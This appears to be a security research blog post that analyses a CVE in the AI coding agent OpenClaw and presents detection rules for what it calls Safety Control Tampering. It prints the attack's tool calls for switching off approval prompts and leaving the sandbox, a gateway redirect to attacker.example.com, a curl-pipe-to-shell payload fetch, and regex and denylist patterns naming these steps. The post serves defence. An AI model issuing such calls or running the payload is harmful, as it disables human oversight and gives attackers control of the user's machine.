munio security research

Safety Control Tampering: A New Class of Attack on AI Agents

CVE-2026-25253 revealed a 1-click RCE in OpenClaw. We analyzed the attack chain and found a pattern that goes beyond this single vulnerability — attackers disabling safety controls before exploitation.

In February 2026, security researcher depthfirst.com disclosed a striking vulnerability in OpenClaw: a 1-click remote code execution chain, tracked as CVE-2026-25253 (CVSS 8.8).

The attack itself is a well-crafted 7-step chain. But what caught our attention wasn’t the final payload — it was steps 5 and 6. Before executing any malicious code, the attacker programmatically turns off the victim’s safety controls. Approval prompts, sandbox isolation — all disabled through legitimate API calls.

This isn’t a bypass. The controls aren’t circumvented. They’re switched off.

We spent time analyzing this pattern, and we believe it represents a distinct attack class worth naming: Safety Control Tampering (SCT). This post walks through the CVE, explains why this pattern matters beyond OpenClaw, and describes how we built detection for it in munio.


How CVE-2026-25253 works

OpenClaw is the most widely used open-source AI coding agent — 328K GitHub stars, over 2 million monthly active users. It connects to MCP servers, executes code, reads files, and browses the web, all driven by tool calls.

The following is based on the original disclosure by depthfirst.com. As of March 2026, Censys shows 21,639 OpenClaw instances exposed to the internet.

Steps 1-4: Gaining control

The attacker first redirects OpenClaw’s gateway to a server they control:

config.patch → { gatewayUrl: "wss://attacker.example.com/ws" }

Through this hijacked connection, they enumerate available tools, map the execution environment, and identify the sandbox configuration. These steps look like ordinary tool calls — nothing a scanner would flag.

Step 5: Turning off approvals

Here’s where it gets interesting:

{
"toolName": "exec.approvals.set",
"params": { "ask": "off", "security": "full" }
}

This disables the approval prompt — the dialog that asks “Allow this command?” before code execution. The security: "full" parameter switches to permissive mode. The user sees nothing: no prompt, no notification, no log entry.

Step 6: Escaping the sandbox

{
"toolName": "config.patch",
"params": { "patch": "tools.exec.host: gateway" }
}

Code execution moves from the sandboxed container to the host machine. The agent now runs commands directly on the user’s system.

Step 7: Arbitrary execution

Terminal window
curl -s https://attacker.example.com/payload.sh | sh

At this point, the attacker has full command execution with the user’s privileges.


The blind spot

Most MCP and agent security tools are built around payload detection — they look for command injection patterns, path traversal sequences, SSRF indicators. They analyze each tool call and ask: is this input dangerous?

That approach works for step 7. But steps 5 and 6 don’t look dangerous at all. There’s no shell metacharacter, no ../, no internal IP address. They’re configuration changes — setting a flag to "off", changing a host parameter. Individually, they’re benign.

The problem is that after these two calls, every safety mechanism that would have caught step 7 is gone. The attacker doesn’t need to bypass detection — there’s nothing left to detect with.

This is the gap. Security tooling checks what a tool call does. It doesn’t check whether a tool call dismantles the controls that protect against future calls.


Defining Safety Control Tampering

We’re proposing Safety Control Tampering as a distinct category to describe attacks where an adversary programmatically disables, weakens, or removes safety controls as a precursor to exploitation.

It’s related to privilege escalation, but not the same thing. Privilege escalation gains new capabilities. SCT removes existing guardrails. The attacker doesn’t need more access — they need fewer checks.

Based on our analysis of CVE-2026-25253 and related attack patterns across agent platforms, we’ve identified five atomic primitives:

PrimitiveDescriptionExample
DISABLE_APPROVALTurns off user confirmation requirementsexec.approvals.set({ask: "off"})
WEAKEN_POLICYRelaxes security mode or policy strictnessexec.approvals.set({security: "full"})
ESCAPE_SANDBOXBreaks out of container or sandbox isolationconfig.patch({sandbox: "off"})
ELEVATE_PRIVILEGESwitches to host-level or privileged executionconfig.patch({tools.exec.host: "gateway"})
BYPASS_VALIDATIONSkips input or origin validationGateway URL redirect to attacker-controlled server

These aren’t OpenClaw-specific. Any system where an AI agent has access to tools that modify its own safety configuration is potentially vulnerable.

Standards mapping

SCT maps to existing security frameworks:


Detection with munio

We built SCT detection into munio across multiple layers. The goal is to catch this pattern at the earliest possible point in the chain — not at the final payload.

Runtime constraints

munio ships YAML-based constraints that block SCT primitives before they execute. For the OpenClaw attack chain, three constraints cover steps 1, 5, and 6:

Step 1 — Gateway URL override:

name: openclaw-gateway-url-override
action: config.patch
check:
type: regex_deny
field: "*"
patterns:
- "\\bgatewayUrl\\b"
- "\\bwss?://[^\\s]+"
on_violation: block
severity: critical

Step 5 — Approval disabling:

name: openclaw-safety-disable-approvals
action: exec.approvals.set
check:
type: denylist
field: ask
values: ["off", "false", "no", "never", "disable", "disabled", "none", "0"]
on_violation: block
severity: critical

Step 6 — Sandbox escape:

name: openclaw-sandbox-escape-host-mode
action: config.patch
check:
type: regex_deny
field: "*"
patterns:
- "\\bhost\\s*:\\s*[\"']?gateway[\"']?"
- "\\bsandbox\\s*:\\s*[\"']?(off|false|disabled|none)[\"']?"
on_violation: block
severity: critical

When the attack reaches step 5, munio blocks it:

POST /v1/openclaw/before-tool-call
tool: exec.approvals.set
params: {“ask”: “off”, “security”: “full”}


BLOCKED Field ‘ask’ matched denied value: off
constraint: openclaw-safety-disable-approvals
category: ASI03 (Identity/Privilege Abuse)

The chain breaks. Steps 6 and 7 never execute.

Static analysis

munio scan detects SCT exposure before any attack happens:

$ munio check '{"tool":"exec.approvals.set","args":{"ask":"off"}}' -c openclaw
BLOCKED
┌─────────────────────────────────────┬──────────┬─────────────────────────────┬───────┐
│ Constraint │ Severity │ Message │ Field │
├─────────────────────────────────────┼──────────┼─────────────────────────────┼───────┤
│ openclaw-safety-disable-approvals │ critical │ Value matches denylist │ ask │
│ │ │ (MatchMode.EXACT) │ │
└─────────────────────────────────────┴──────────┴─────────────────────────────┴───────┘
Mode: enforce | Checked: 3 | 0.3ms

Beyond OpenClaw

SCT is not specific to OpenClaw. It’s a pattern that applies wherever an AI agent can modify its own operating constraints:

If the agent can call it, an attacker can make the agent call it — through prompt injection, tool poisoning, or, as in this case, hijacked instructions.

munio includes 3 generic constraints designed to catch SCT regardless of the underlying platform:


Recommendations

If you run OpenClaw: check your exposure. The vulnerability affects all versions with default configuration.

If you build with AI agents: audit whether your agents have access to tools that can modify their own safety controls. If they do, those tools need pre-execution verification.

To scan your MCP servers for SCT exposure:

Terminal window
pip install munio
munio scan --server "npx @your/mcp-server"
munio check '{"tool":"exec.approvals.set","args":{"ask":"off"}}' -c openclaw

OpenClaw-specific constraints: constraints/openclaw/asi03-privilege-abuse/ Generic SCT constraints: constraints/generic/asi03-privilege-abuse/

Documentation: OpenClaw Integration | Security Model | Constraints Reference


CVE-2026-25253 was discovered and disclosed by depthfirst.com. Our contribution is the SCT taxonomy and automated detection tooling for this attack class.